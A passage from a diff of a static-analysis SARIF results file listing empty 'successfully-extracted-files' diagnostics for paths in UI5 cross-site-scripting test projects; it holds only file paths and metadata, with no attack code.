"%SRCROOT%", + "index" : 250 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js", + "uriBaseId" : "%SRCROOT%", + "index" : 251 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 252 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 253 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js", + "uriBaseId" : "%SRCROOT%", + "index" : 254 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 255 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 256 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js", + "uriBaseId" : "%SRCROOT%", + "index" : 257 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 258 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 259 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 260 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js", + "uriBaseId" : "%SRCROOT%", + "index" : 261 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 262 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 263 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 264 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 265 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 266 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 267 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 268 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 269 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 270 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 271 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 272 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 273 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 274 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 275 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 276 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 277 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 278 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 279 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 280 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 281 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 282 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 283 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 284 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 285 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 286 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 287 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 288 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 289 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 290 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 291 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 292 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 293 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 294 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 295 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 296 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 297 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 298 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 299 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 300 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 301 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 302 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 303 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 304 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 305 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 306 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 307 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 308 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 309 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 310 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.html", + "uriBaseId" : 